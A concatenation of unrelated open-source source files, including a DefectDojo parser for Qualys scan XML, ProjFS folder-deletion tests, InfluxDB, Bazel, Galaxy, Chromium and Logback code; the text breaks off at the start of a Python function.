<gh_stars>1000+ import logging from datetime import datetime import html2text from dateutil import parser from defusedxml import ElementTree from dojo.models import Endpoint, Finding logger = logging.getLogger(__name__) def htmltext(blob): h = html2text.HTML2Text() h.ignore_links = False return h.handle(blob) def issue_r(raw_row, vuln, scan_date): ret_rows = [] issue_row = {} # IP ADDRESS issue_row['ip_address'] = raw_row.get('value') # FQDN issue_row['fqdn'] = raw_row.get('name') if issue_row['fqdn'] == "No registered hostname": issue_row['fqdn'] = None # port _port = raw_row.get('port') # Create Endpoint if issue_row['fqdn']: ep = Endpoint(host=issue_row['fqdn']) else: ep = Endpoint(host=issue_row['ip_address']) # OS NAME issue_row['os'] = raw_row.findtext('OS') # Scan details - VULNS//VULN indicates we only care about confirmed vulnerabilities for vuln_cat in raw_row.findall('VULNS/CAT'): _category = str(vuln_cat.get('value')) for vuln_details in vuln_cat.findall('VULN'): _temp = issue_row _gid = vuln_details.get('number') _temp['port_status'] = _port _result = str(vuln_details.findtext('RESULT')) # Vuln name _temp['vuln_name'] = vuln_details.findtext('TITLE') # Vuln Description _description = str(vuln_details.findtext('DIAGNOSIS')) # Solution Strips Heading Workaround(s) _temp['solution'] = htmltext(str(vuln_details.findtext('SOLUTION'))) # Vuln_description _temp['vuln_description'] = "\n".join([htmltext(_description), htmltext("**Category:** " + _category), htmltext("**QID:** " + str(_gid)), htmltext("**Port:** " + str(_port)), htmltext("**Result Evidence:** " + _result), ]) # Impact description _temp['IMPACT'] = htmltext(str(vuln_details.findtext('CONSEQUENCE'))) # CVE and LINKS _cl = [] _temp_cve_details = vuln_details.iterfind('CVE_ID_LIST/CVE_ID') if _temp_cve_details: _cl = {cve_detail.findtext('ID'): cve_detail.findtext('URL') for cve_detail in _temp_cve_details} _temp['cve'] = "\n".join(list(_cl.keys())) _temp['links'] = "\n".join(list(_cl.values())) # The CVE in Qualys report might not have a CVSS score, so findings are informational by default # unless we can find map to a Severity OR a CVSS score from the findings detail. sev = qualys_convert_severity(vuln_details.get('severity')) refs = "\n".join(list(_cl.values())) finding = Finding(title=_temp['vuln_name'], mitigation=_temp['solution'], description=_temp['vuln_description'], severity=sev, references=refs, impact=_temp['IMPACT'], vuln_id_from_tool=_gid, date=scan_date, ) finding.unsaved_endpoints = list() finding.unsaved_endpoints.append(ep) ret_rows.append(finding) return ret_rows def qualys_convert_severity(raw_val): val = str(raw_val).strip() if '1' == val: return 'Info' elif '2' == val: return 'Low' elif '3' == val: return 'Medium' elif '4' == val: return 'High' elif '5' == val: return 'Critical' else: return 'Info' class QualysInfrascanWebguiParser(object): def get_scan_types(self): return ["Qualys Infrastructure Scan (WebGUI XML)"] def get_label_for_scan_types(self, scan_type): return scan_type # no custom label for now def get_description_for_scan_types(self, scan_type): return "Qualys WebGUI output files can be imported in XML format." 
def get_findings(self, file, test): data = ElementTree.parse(file).getroot() # fetch scan date e.g.: <KEY value="DATE">2020-01-30T09:45:41Z</KEY> scan_date = datetime.now() for i in data.findall('HEADER/KEY'): if i.get('value') == 'DATE': scan_date = parser.isoparse(i.text) master_list = [] for issue in data.findall('IP'): master_list += issue_r(issue, data, scan_date) return master_list
2,464
32,544
package com.baeldung.dddhexagonalspring.domain.repository; import com.baeldung.dddhexagonalspring.domain.Order; import java.util.Optional; import java.util.UUID; public interface OrderRepository { Optional<Order> findById(UUID id); void save(Order order); }
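A hypothetical in-memory adapter (not part of the original sample) for this hexagonal-architecture port, useful for unit tests; it assumes the domain Order exposes a getId() accessor.

import java.util.Map;
import java.util.Optional;
import java.util.UUID;
import java.util.concurrent.ConcurrentHashMap;

import com.baeldung.dddhexagonalspring.domain.Order;
import com.baeldung.dddhexagonalspring.domain.repository.OrderRepository;

public class InMemoryOrderRepository implements OrderRepository {

    private final Map<UUID, Order> store = new ConcurrentHashMap<>();

    @Override
    public Optional<Order> findById(UUID id) {
        return Optional.ofNullable(store.get(id));
    }

    @Override
    public void save(Order order) {
        store.put(order.getId(), order); // assumes Order#getId(); adapt to the real accessor
    }
}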
96
1,152
#include "stdafx.h" #include "ProjFS_DeleteFolderTest.h" #include "SafeHandle.h" #include "TestException.h" #include "TestHelpers.h" #include "TestVerifiers.h" #include "Should.h" using namespace TestHelpers; using namespace TestVerifiers; static const std::string TEST_ROOT_FOLDER("\\GVFlt_DeleteFolderTest"); // -------------------- // // Special note on "EmptyFolder". In our tests, this folder actually has a single empty file because Git // does not allow committing empty folders. // // -------------------- bool ProjFS_DeleteVirtualNonEmptyFolder_SetDisposition(const char* virtualRootPath) { try { std::string testScratchRoot = virtualRootPath + TEST_ROOT_FOLDER + std::string("\\GVFlt_DeleteVirtualNonEmptyFolder_SetDisposition\\"); DWORD error = DelFolder(testScratchRoot + "NonEmptyFolder"); VERIFY_ARE_EQUAL((DWORD)ERROR_DIR_NOT_EMPTY, error); std::vector<std::string> expected = { "EmptyFolder", "NonEmptyFolder", "TestFile.txt" }; ExpectDirEntries(testScratchRoot, expected); VERIFY_ARE_EQUAL(false, IsFullFolder(testScratchRoot)); VERIFY_ARE_EQUAL(true, DoesFileExist(testScratchRoot + "NonEmptyFolder")); VERIFY_ARE_EQUAL(true, DoesFileExist(testScratchRoot + "EmptyFolder")); VERIFY_ARE_EQUAL(false, IsFullFolder(testScratchRoot + "NonEmptyFolder")); } catch (TestException&) { return false; } return true; } bool ProjFS_DeleteVirtualNonEmptyFolder_DeleteOnClose(const char* virtualRootPath) { try { std::string testScratchRoot = virtualRootPath + TEST_ROOT_FOLDER + std::string("\\GVFlt_DeleteVirtualNonEmptyFolder_DeleteOnClose\\"); DWORD error = DelFolder(testScratchRoot + "NonEmptyFolder", false); VERIFY_ARE_EQUAL((DWORD)ERROR_SUCCESS, error); std::vector<std::string> expected = { "EmptyFolder", "NonEmptyFolder", "TestFile.txt" }; ExpectDirEntries(testScratchRoot, expected); VERIFY_ARE_EQUAL(false, IsFullFolder(testScratchRoot)); VERIFY_ARE_EQUAL(true, DoesFileExist(testScratchRoot + "NonEmptyFolder")); VERIFY_ARE_EQUAL(true, DoesFileExist(testScratchRoot + "EmptyFolder")); VERIFY_ARE_EQUAL(false, IsFullFolder(testScratchRoot + "NonEmptyFolder")); } catch (TestException&) { return false; } return true; } bool ProjFS_DeletePlaceholderNonEmptyFolder_SetDisposition(const char* virtualRootPath) { try { std::string testScratchRoot = virtualRootPath + TEST_ROOT_FOLDER + std::string("\\GVFlt_DeletePlaceholderNonEmptyFolder_SetDisposition\\"); // make it a placeholder folder EnumDirectory(testScratchRoot + "NonEmptyFolder"); DWORD error = DelFolder(testScratchRoot + "NonEmptyFolder"); VERIFY_ARE_EQUAL((DWORD)ERROR_DIR_NOT_EMPTY, error); std::vector<std::string> expected = { "EmptyFolder", "NonEmptyFolder", "TestFile.txt" }; ExpectDirEntries(testScratchRoot, expected); VERIFY_ARE_EQUAL(false, IsFullFolder(testScratchRoot)); VERIFY_ARE_EQUAL(true, DoesFileExist(testScratchRoot + "NonEmptyFolder")); VERIFY_ARE_EQUAL(true, DoesFileExist(testScratchRoot + "EmptyFolder")); VERIFY_ARE_EQUAL(false, IsFullFolder(testScratchRoot + "NonEmptyFolder")); } catch (TestException&) { return false; } return true; } bool ProjFS_DeletePlaceholderNonEmptyFolder_DeleteOnClose(const char* virtualRootPath) { try { std::string testScratchRoot = virtualRootPath + TEST_ROOT_FOLDER + std::string("\\GVFlt_DeletePlaceholderNonEmptyFolder_DeleteOnClose\\"); // make it a placeholder folder EnumDirectory(testScratchRoot + "NonEmptyFolder"); DWORD error = DelFolder(testScratchRoot + "NonEmptyFolder", false); VERIFY_ARE_EQUAL((DWORD)ERROR_SUCCESS, error); std::vector<std::string> expected = { "EmptyFolder", "NonEmptyFolder", 
"TestFile.txt" }; ExpectDirEntries(testScratchRoot, expected); VERIFY_ARE_EQUAL(false, IsFullFolder(testScratchRoot)); VERIFY_ARE_EQUAL(true, DoesFileExist(testScratchRoot + "NonEmptyFolder")); VERIFY_ARE_EQUAL(true, DoesFileExist(testScratchRoot + "EmptyFolder")); VERIFY_ARE_EQUAL(false, IsFullFolder(testScratchRoot + "NonEmptyFolder")); } catch (TestException&) { return false; } return true; } bool ProjFS_DeleteLocalEmptyFolder_SetDisposition(const char* virtualRootPath) { try { std::string testScratchRoot = virtualRootPath + TEST_ROOT_FOLDER + std::string("\\GVFlt_DeleteLocalEmptyFolder_SetDisposition\\"); // create a new local folder CreateDirectoryWithIntermediates(testScratchRoot + "localFolder\\"); DWORD error = DelFolder(testScratchRoot + "localFolder"); VERIFY_ARE_EQUAL((DWORD)ERROR_SUCCESS, error); std::vector<std::string> expected = { "EmptyFolder", "NonEmptyFolder", "TestFile.txt" }; ExpectDirEntries(testScratchRoot, expected); VERIFY_ARE_EQUAL(false, IsFullFolder(testScratchRoot)); VERIFY_ARE_EQUAL(true, DoesFileExist(testScratchRoot + "NonEmptyFolder")); VERIFY_ARE_EQUAL(true, DoesFileExist(testScratchRoot + "EmptyFolder")); VERIFY_ARE_EQUAL(true, DoesFileExist(testScratchRoot + "NonEmptyFolder\\" + "bar.txt")); VERIFY_ARE_EQUAL(false, IsFullFolder(testScratchRoot + "NonEmptyFolder")); } catch (TestException&) { return false; } return true; } bool ProjFS_DeleteLocalEmptyFolder_DeleteOnClose(const char* virtualRootPath) { try { std::string testScratchRoot = virtualRootPath + TEST_ROOT_FOLDER + std::string("\\GVFlt_DeleteLocalEmptyFolder_DeleteOnClose\\"); // create a new local folder CreateDirectoryWithIntermediates(testScratchRoot + "localFolder\\"); DWORD error = DelFolder(testScratchRoot + "localFolder", false); VERIFY_ARE_EQUAL((DWORD)ERROR_SUCCESS, error); std::vector<std::string> expected = { "EmptyFolder", "NonEmptyFolder", "TestFile.txt" }; ExpectDirEntries(testScratchRoot, expected); VERIFY_ARE_EQUAL(false, IsFullFolder(testScratchRoot)); VERIFY_ARE_EQUAL(true, DoesFileExist(testScratchRoot + "NonEmptyFolder")); VERIFY_ARE_EQUAL(true, DoesFileExist(testScratchRoot + "EmptyFolder")); VERIFY_ARE_EQUAL(true, DoesFileExist(testScratchRoot + "NonEmptyFolder\\" + "bar.txt")); VERIFY_ARE_EQUAL(false, IsFullFolder(testScratchRoot + "NonEmptyFolder")); } catch (TestException&) { return false; } return true; } bool ProjFS_DeleteNonRootVirtualFolder_SetDisposition(const char* virtualRootPath) { try { std::string testScratchRoot = virtualRootPath + TEST_ROOT_FOLDER + std::string("\\GVFlt_DeleteNonRootVirtualFolder_SetDisposition\\"); std::string testFolder = "A\\B\\C\\D\\"; std::string targetFolder = "E\\"; std::string testFile = "test.txt"; // NOTE: Deviate from ProjFS's DeleteNonRootVirtualFolder_SetDisposition here by deleting a file first // Git will not allow empty folders to be commited, and so \E must have a file in it DWORD fileError = DelFile(testScratchRoot + testFolder + targetFolder + testFile); VERIFY_ARE_EQUAL((DWORD)ERROR_SUCCESS, fileError); DWORD error = DelFolder(testScratchRoot + testFolder + targetFolder); VERIFY_ARE_EQUAL((DWORD)ERROR_SUCCESS, error); std::vector<std::string> expected = {}; ExpectDirEntries(testScratchRoot + testFolder, expected); VERIFY_ARE_EQUAL(false, IsFullFolder(testScratchRoot + testFolder)); VERIFY_ARE_EQUAL(false, DoesFileExist(testScratchRoot + testFolder + targetFolder)); } catch (TestException&) { return false; } return true; } bool ProjFS_DeleteNonRootVirtualFolder_DeleteOnClose(const char* virtualRootPath) { try { std::string 
testScratchRoot = virtualRootPath + TEST_ROOT_FOLDER + std::string("\\GVFlt_DeleteNonRootVirtualFolder_DeleteOnClose\\"); std::string testFolder = "A\\B\\C\\D\\"; std::string targetFolder = "E\\"; std::string testFile = "test.txt"; // NOTE: Deviate from ProjFS's DeleteNonRootVirtualFolder_DeleteOnClose here by deleting a file first // Git will not allow empty folders to be commited, and so \E must have a file in it DWORD fileError = DelFile(testScratchRoot + testFolder + targetFolder + testFile); VERIFY_ARE_EQUAL((DWORD)ERROR_SUCCESS, fileError); DWORD error = DelFolder(testScratchRoot + testFolder + targetFolder, false); VERIFY_ARE_EQUAL((DWORD)ERROR_SUCCESS, error); std::vector<std::string> expected = {}; ExpectDirEntries(testScratchRoot + testFolder, expected); VERIFY_ARE_EQUAL(false, IsFullFolder(testScratchRoot + testFolder)); VERIFY_ARE_EQUAL(false, DoesFileExist(testScratchRoot + testFolder + targetFolder)); } catch (TestException&) { return false; } return true; }
3,919
1,024
package org.influxdb.querybuilder; import java.util.ArrayList; import java.util.List; import org.influxdb.querybuilder.clauses.AndConjunction; import org.influxdb.querybuilder.clauses.Clause; import org.influxdb.querybuilder.clauses.ConjunctionClause; import org.influxdb.querybuilder.clauses.OrConjunction; public class WhereCoreImpl<T extends Select> implements Select, Where { private final List<ConjunctionClause> clauses = new ArrayList<>(); private final T statement; WhereCoreImpl(final T statement) { this.statement = statement; } @Override public WhereCoreImpl and(final Clause clause) { clauses.add(new AndConjunction(clause)); return this; } @Override public WhereCoreImpl or(final Clause clause) { clauses.add(new OrConjunction(clause)); return this; } @Override public WhereCoreImpl where() { return statement.where(); } @Override public WhereCoreImpl where(final Clause clause) { return statement.where(clause); } @Override public WhereCoreImpl where(final String text) { return statement.where(text); } @Override public List<ConjunctionClause> getClauses() { return clauses; } @Override public WhereNested andNested() { return new WhereNested<>(this, false); } @Override public WhereNested orNested() { return new WhereNested<>(this, true); } @Override public SelectCoreImpl orderBy(final Ordering orderings) { return statement.orderBy(orderings); } @Override public SelectCoreImpl groupBy(final Object... columns) { return statement.groupBy(columns); } @Override public SelectCoreImpl fill(final Number value) { return statement.fill(value); } @Override public SelectCoreImpl fill(final String value) { return statement.fill(value); } @Override public SelectCoreImpl limit(final int limit) { return statement.limit(limit); } @Override public SelectCoreImpl limit(final int limit, final long offSet) { return statement.limit(limit, offSet); } @Override public SelectCoreImpl sLimit(final int sLimit) { return statement.sLimit(sLimit); } @Override public SelectCoreImpl sLimit(final int sLimit, final long sOffSet) { return statement.sLimit(sLimit, sOffSet); } @Override public SelectCoreImpl tz(final String timezone) { return statement.tz(timezone); } }
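A hedged usage sketch (not from the project sources): the fluent chain below assumes the static factories select/eq/gt exposed by org.influxdb.querybuilder.BuiltQuery.QueryBuilder in influxdb-java. where(...) hands back this Where implementation, and and(...) appends an AndConjunction exactly as in the class above.

import static org.influxdb.querybuilder.BuiltQuery.QueryBuilder.eq;
import static org.influxdb.querybuilder.BuiltQuery.QueryBuilder.gt;
import static org.influxdb.querybuilder.BuiltQuery.QueryBuilder.select;

import org.influxdb.dto.Query;

public class WhereChainExample {
    public static void main(String[] args) {
        Query query = select("usage_idle")
                .from("telegraf", "cpu")          // database, measurement
                .where(eq("host", "server01"))    // first clause opens the WHERE chain
                .and(gt("usage_idle", 90))        // appended as an AndConjunction
                .limit(10);
        System.out.println(query.getCommand());
    }
}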
767
445
"""This module contains functions which operate on discrete sequences. Transforms - ``fft``, ``ifft``, ``ntt``, ``intt``, ``fwht``, ``ifwht``, ``mobius_transform``, ``inverse_mobius_transform`` Convolutions - ``convolution``, ``convolution_fft``, ``convolution_ntt``, ``convolution_fwht``, ``convolution_subset``, ``covering_product``, ``intersecting_product`` """ from .transforms import (fft, ifft, ntt, intt, fwht, ifwht, mobius_transform, inverse_mobius_transform) from .convolutions import convolution, covering_product, intersecting_product
223
16,989
<reponame>AyuMol758/bazel // Copyright 2021 The Bazel Authors. All rights reserved. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. // package com.google.devtools.build.lib.bazel.bzlmod; import com.google.devtools.build.lib.server.FailureDetails.ExternalDeps; import com.google.devtools.build.lib.server.FailureDetails.FailureDetail; import com.google.devtools.build.lib.skyframe.DetailedException; import com.google.devtools.build.lib.util.DetailedExitCode; import com.google.errorprone.annotations.FormatMethod; import com.google.errorprone.annotations.FormatString; import javax.annotation.Nullable; /** Exception indicates that something went wrong while processing external dependencies. */ public class ExternalDepsException extends Exception implements DetailedException { private final DetailedExitCode detailedExitCode; public ExternalDepsException(String message, @Nullable Throwable cause, ExternalDeps.Code code) { super(message, cause); detailedExitCode = DetailedExitCode.of( FailureDetail.newBuilder() .setMessage(message) .setExternalDeps(ExternalDeps.newBuilder().setCode(code).build()) .build()); } @FormatMethod public static ExternalDepsException withMessage( ExternalDeps.Code code, @FormatString String format, Object... args) { return new ExternalDepsException(String.format(format, args), null, code); } @FormatMethod public static ExternalDepsException withCauseAndMessage( ExternalDeps.Code code, Throwable cause, @FormatString String format, Object... args) { return new ExternalDepsException( String.format(format, args) + ": " + cause.getMessage(), cause, code); } @Override public DetailedExitCode getDetailedExitCode() { return detailedExitCode; } }
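A hedged sketch (not from the Bazel tree) of how callers are expected to use the static factory methods above; the particular ExternalDeps.Code constant is an assumption chosen for illustration.

import com.google.devtools.build.lib.bazel.bzlmod.ExternalDepsException;
import com.google.devtools.build.lib.server.FailureDetails.ExternalDeps;

public class RegistryCheck {
  static void ensureReachable(boolean reachable, String url) throws ExternalDepsException {
    if (!reachable) {
      // Formats the message and attaches a structured failure code that ends up in the
      // DetailedExitCode surfaced to the user. Code constant below is assumed, not verified.
      throw ExternalDepsException.withMessage(
          ExternalDeps.Code.ERROR_ACCESSING_REGISTRY, "cannot reach registry %s", url);
    }
  }
}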
702
1,085
<filename>scripts/api/fetch_to_library.py<gh_stars>1000+ import argparse import json import requests import yaml def main(): parser = argparse.ArgumentParser(description='Upload a directory into a data library') parser.add_argument("-u", "--url", dest="url", required=True, help="Galaxy URL") parser.add_argument("-a", "--api", dest="api_key", required=True, help="API Key") parser.add_argument('target', metavar='FILE', type=str, help='file describing data library to fetch') args = parser.parse_args() with open(args.target) as f: target = yaml.safe_load(f) histories_url = args.url + "/api/histories" new_history_response = requests.post(histories_url, data={'key': args.api_key}) fetch_url = args.url + '/api/tools/fetch' payload = { 'key': args.api_key, 'targets': json.dumps([target]), 'history_id': new_history_response.json()["id"] } response = requests.post(fetch_url, data=payload) print(response.content) if __name__ == '__main__': main()
418
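The Galaxy script above expects a YAML file describing a single fetch "target" and posts it to /api/tools/fetch. The sketch below shows one way it might be driven end to end; the target layout (destination/items fields) is an illustrative assumption rather than Galaxy's documented schema, and the URL and API key are placeholders.

# Hypothetical driver for fetch_to_library.py shown above. The target layout
# written here is an assumption; consult Galaxy's /api/tools/fetch
# documentation for the authoritative schema.
import subprocess
import yaml

example_target = {
    "destination": {"type": "hdas"},          # assumed destination block
    "items": [                                # assumed list of files to fetch
        {"src": "url", "url": "https://example.org/data.txt", "ext": "txt"},
    ],
}

with open("target.yml", "w") as handle:
    yaml.safe_dump(example_target, handle)

subprocess.run(
    ["python", "fetch_to_library.py",
     "-u", "https://galaxy.example.org",      # placeholder Galaxy URL
     "-a", "MY_API_KEY",                      # placeholder API key
     "target.yml"],
    check=True,
)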
856
<filename>include/armnnSerializer/ISerializer.hpp // // Copyright © 2017 Arm Ltd. All rights reserved. // SPDX-License-Identifier: MIT // #pragma once #include "armnn/INetwork.hpp" #include "armnn/NetworkFwd.hpp" #include "armnn/Types.hpp" namespace armnnSerializer { class ISerializer; using ISerializerPtr = std::unique_ptr<ISerializer, void(*)(ISerializer* serializer)>; class ISerializer { public: static ISerializer* CreateRaw(); static ISerializerPtr Create(); static void Destroy(ISerializer* serializer); /// Serializes the network to ArmNN SerializedGraph. /// @param [in] inNetwork The network to be serialized. void Serialize(const armnn::INetwork& inNetwork); /// Serializes the SerializedGraph to the stream. /// @param [stream] the stream to save to /// @return true if graph is Serialized to the Stream, false otherwise bool SaveSerializedToStream(std::ostream& stream); private: ISerializer(); ~ISerializer(); class SerializerImpl; std::unique_ptr<SerializerImpl> pSerializerImpl; }; } //namespace armnnSerializer
368
14,668
<reponame>zealoussnow/chromium // Copyright 2020 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. package org.chromium.components.autofill; import android.os.IBinder; import org.chromium.base.test.util.CallbackHelper; import org.chromium.components.autofill_public.IAutofillHintsService; import org.chromium.components.autofill_public.IViewTypeCallback; import org.chromium.components.autofill_public.ViewType; import java.util.List; /** * This class implements and registers IViewTypeCallback for testing. */ public class AutofillHintsServiceTestHelper { public void registerViewTypeService(IBinder binder) throws Exception { IAutofillHintsService.Stub.asInterface(binder).registerViewTypeCallback(getBinder()); } private IViewTypeCallback.Stub mBinder = new IViewTypeCallback.Stub() { @Override public void onViewTypeAvailable(List<ViewType> viewTypeList) { mViewTypeList = viewTypeList; mCallbackHelper.notifyCalled(); } @Override public void onQueryFailed() { mQueryFailed = true; mCallbackHelper.notifyCalled(); } }; private List<ViewType> mViewTypeList; private boolean mQueryFailed; private CallbackHelper mCallbackHelper = new CallbackHelper(); public IViewTypeCallback getBinder() { return mBinder; } public List<ViewType> getViewTypes() { return mViewTypeList; } public boolean isQueryFailed() { return mQueryFailed; } public void waitForCallbackInvoked() throws Exception { mCallbackHelper.waitForCallback(0); } }
630
1,738
<reponame>jeikabu/lumberyard #pragma once /* * All or portions of this file Copyright (c) Amazon.com, Inc. or its affiliates or * its licensors. * * For complete copyright and license terms please see the LICENSE at the root of this * distribution (the "License"). All use of this software is governed by the License, * or, if provided, by the license below or the license accompanying this file. Do not * remove or modify any license notices. This file is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * */ // This is the interface object that handles the ## directive processing in the shader files. It // pre-processes the text stream in a C-like manner, removing chunks of text from the input stream // so that they never enter the token stream. // // supported directives: // ##if - works like C #if, currently supports only the following tests: // ##if token - enables the branch if token is defined // ##if token1 == token2 - will first try to expand the two tokens, then will string compare the result. // If a token isn't expanded, it will be used as the string to compare. // ##elif - just like C #if, same caveats as ##if // ##else - just like C #else // ##endif - just like C #endif // ##define - just like C define, but doesn't support parenthesis so it is just the token // ##undef - just like C undef // ##include_restricted(rootfile, macro) - // This will build a filename using macro and rootfile and then process it. For example, given // ##include_restricted(shader_cfx, AZ_RESTRICTED_PLATFORM) and AZ_RESTRICTED_PLATFORM set to "banana", // it will open and process a file called "banana/shader_cfx_banana.cfr". class PoundPoundContext { public: explicit PoundPoundContext(const AZStd::string& shadersFilter); PoundPoundContext(const PoundPoundContext& other) = delete; void operator=(const PoundPoundContext& other) = delete; ~PoundPoundContext(); // Call this function when encountering ## in the input stream. It will consume all text starting with the ## // until it reaches a state where regular token parsing might be enabled again void PreprocessLines(char** buf); // Callers need to use this function to test for the end of the buffer because we handle switching from an // include file back to the #including file inside this function. The layerSwitch bool is needed so that the // caller can know that they need to possibly start scanning for comments/whitespace again due to the change // in which buffer is being scanned bool IsEndOfBuffer(char** buf, bool* layerSwitch); private: class Impl; Impl *m_impl; };
817
1,208
<reponame>cclovett/iRemeberM ../../../WCDB/sqlcipher/src/sqlcipher.h
33
27,173
import unittest class TestAnagrams(unittest.TestCase): def test_group_anagrams(self): anagram = Anagram() self.assertRaises(TypeError, anagram.group_anagrams, None) data = ['ram', 'act', 'arm', 'bat', 'cat', 'tab'] expected = ['ram', 'arm', 'act', 'cat', 'bat', 'tab'] self.assertEqual(anagram.group_anagrams(data), expected) print('Success: test_group_anagrams') def main(): test = TestAnagrams() test.test_group_anagrams() if __name__ == '__main__': main()
228
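The unit test above instantiates an Anagram class that is not part of this file (in the original challenge repository the solution lives alongside the test). A minimal sketch that would satisfy its two assertions, offered as an assumption rather than the original author's solution:

# Hypothetical Anagram implementation matching the expectations of the test
# above: None input raises TypeError, and words are grouped by anagram class
# while preserving first-seen order.
from collections import OrderedDict

class Anagram(object):

    def group_anagrams(self, items):
        if items is None:
            raise TypeError('items cannot be None')
        groups = OrderedDict()           # sorted letters -> words in input order
        for word in items:
            groups.setdefault(''.join(sorted(word)), []).append(word)
        return [word for group in groups.values() for word in group]

# group_anagrams(['ram', 'act', 'arm', 'bat', 'cat', 'tab'])
# -> ['ram', 'arm', 'act', 'cat', 'bat', 'tab']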
721
package crazypants.enderio.base.integration.ic2c; import javax.annotation.Nonnull; import crazypants.enderio.api.farm.IFarmerJoe; import crazypants.enderio.base.EnderIO; import crazypants.enderio.base.Log; import crazypants.enderio.base.events.EnderIOLifecycleEvent; import crazypants.enderio.base.farming.FarmersRegistry; import crazypants.enderio.base.farming.farmers.RubberTreeFarmer; import net.minecraftforge.event.RegistryEvent; import net.minecraftforge.fml.common.Mod.EventBusSubscriber; import net.minecraftforge.fml.common.eventhandler.SubscribeEvent; @EventBusSubscriber(modid = EnderIO.MODID) public class IC2cUtil { @SubscribeEvent public static void registerFarmers(@Nonnull RegistryEvent.Register<IFarmerJoe> event) { RubberTreeFarmer farmer = RubberTreeFarmerIC2classic.create(); if (farmer != null) { event.getRegistry().register(farmer.setRegistryName("ic2c", "trees")); Log.info("Farming Station: IC2 classic integration fully loaded"); } else { Log.info("Farming Station: IC2 classic integration not loaded"); } } @SubscribeEvent public static void registerTreetaps(@Nonnull EnderIOLifecycleEvent.Init.Pre event) { FarmersRegistry.registerTreetaps("ic2", "itemtreetap"); } }
426
2,177
<filename>vendor/cache/gems/nokogiri-1.6.7.2/ext/nokogiri/html_element_description.h #ifndef NOKOGIRI_HTML_ELEMENT_DESCRIPTION #define NOKOGIRI_HTML_ELEMENT_DESCRIPTION #include <nokogiri.h> void init_html_element_description(); extern VALUE cNokogiriHtmlElementDescription ; #endif
118
1,738
<gh_stars>1000+ /* * All or portions of this file Copyright (c) Amazon.com, Inc. or its affiliates or * its licensors. * * For complete copyright and license terms please see the LICENSE at the root of this * distribution (the "License"). All use of this software is governed by the License, * or, if provided, by the license below or the license accompanying this file. Do not * remove or modify any license notices. This file is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * */ #pragma once #include <AzCore/base.h> #include <AzCore/PlatformDef.h> #include <gmock/gmock.h> #include <ostream> namespace AZ { class Vector2; class Vector3; class Vector4; class Quaternion; class Transform; class Color; std::ostream& operator<<(std::ostream& os, const Vector2& vec); std::ostream& operator<<(std::ostream& os, const Vector3& vec); std::ostream& operator<<(std::ostream& os, const Vector4& vec); std::ostream& operator<<(std::ostream& os, const Quaternion& quat); std::ostream& operator<<(std::ostream& os, const Transform& transform); std::ostream& operator<<(std::ostream& os, const Color& transform); } // namespace AZ namespace UnitTest { // is-close matcher to make tests easier to read and failures more useful MATCHER_P(IsClose, expected, "") { AZ_UNUSED(result_listener); return arg.IsClose(expected); } // is-close matcher with tolerance to make tests easier to read and failures more useful MATCHER_P2(IsCloseTolerance, expected, tolerance, "") { AZ_UNUSED(result_listener); return arg.IsClose(expected, tolerance); } // is-close matcher for use with Pointwise container comparisons MATCHER(ContainerIsClose, "") { AZ_UNUSED(result_listener); const auto& [expected, actual] = arg; return expected.IsClose(actual); } // is-close matcher with tolerance for use with Pointwise container comparisons MATCHER_P(ContainerIsCloseTolerance, tolerance, "") { AZ_UNUSED(result_listener); const auto& [expected, actual] = arg; return expected.IsClose(actual, tolerance); } // IsFinite matcher to make it easier to validate Vector2, Vector3, Vector4 and Quaternion. // For example: // AZ::Quaternion rotation; // EXPECT_THAT(rotation, IsFinite()); // // AZStd::vector<AZ::Vector3> positions; // EXPECT_THAT(positions, ::testing::Each(IsFinite())); MATCHER(IsFinite, "") { AZ_UNUSED(result_listener); return arg.IsFinite(); } } // namespace UnitTest
977
880
<gh_stars>100-1000 /** * Copyright 2019 <NAME> * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package ch.qos.logback.core.joran.spi; import java.util.ArrayList; import java.util.List; public class CaseCombinator { List<String> combinations(String in) { int length = in.length(); List<String> permutationsList = new ArrayList<String>(); int totalCombinations = computeTotalNumerOfCombinations(in, length); for (int j = 0; j < totalCombinations; j++) { StringBuilder newCombination = new StringBuilder(); int pos = 0; for (int i = 0; i < length; i++) { char c = in.charAt(i); if (isEnglishLetter(c)) { c = permute(c, j, pos); pos++; } newCombination.append(c); } permutationsList.add(newCombination.toString()); } return permutationsList; } private char permute(char c, int permutation, int position) { int mask = 1 << position; boolean shouldBeInUpperCase = (permutation & mask) != 0; boolean isEffectivelyUpperCase = isUpperCase(c); if (shouldBeInUpperCase && !isEffectivelyUpperCase) return toUpperCase(c); if (!shouldBeInUpperCase && isEffectivelyUpperCase) return toLowerCase(c); return c; } private int computeTotalNumerOfCombinations(String in, int length) { int count = 0; for (int i = 0; i < length; i++) { char c = in.charAt(i); if (isEnglishLetter(c)) count++; } // return 2^count (2 to the power of count) return (1 << count); } private char toUpperCase(char c) { if ('A' <= c && c <= 'Z') { return c; } if ('a' <= c && c <= 'z') { return (char) ((int) c + 'A' - 'a'); } // code should never reach this point return c; } private char toLowerCase(char c) { if ('a' <= c && c <= 'z') { return c; } if ('A' <= c && c <= 'Z') { return (char) ((int) c + 'a' - 'A'); } // code should never reach this point return c; } private boolean isEnglishLetter(char c) { if ('a' <= c && c <= 'z') return true; if ('A' <= c && c <= 'Z') return true; return false; } private boolean isUpperCase(char c) { return ('A' <= c && c <= 'Z'); } }
1,063
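The CaseCombinator class above enumerates every upper/lower-case variant of a string by treating each ASCII letter position as one bit of a counter. A compact Python rendering of the same idea, included purely as an illustration (it is not part of the original library):

# Bitmask-driven case permutation, mirroring CaseCombinator.combinations().
def case_combinations(text):
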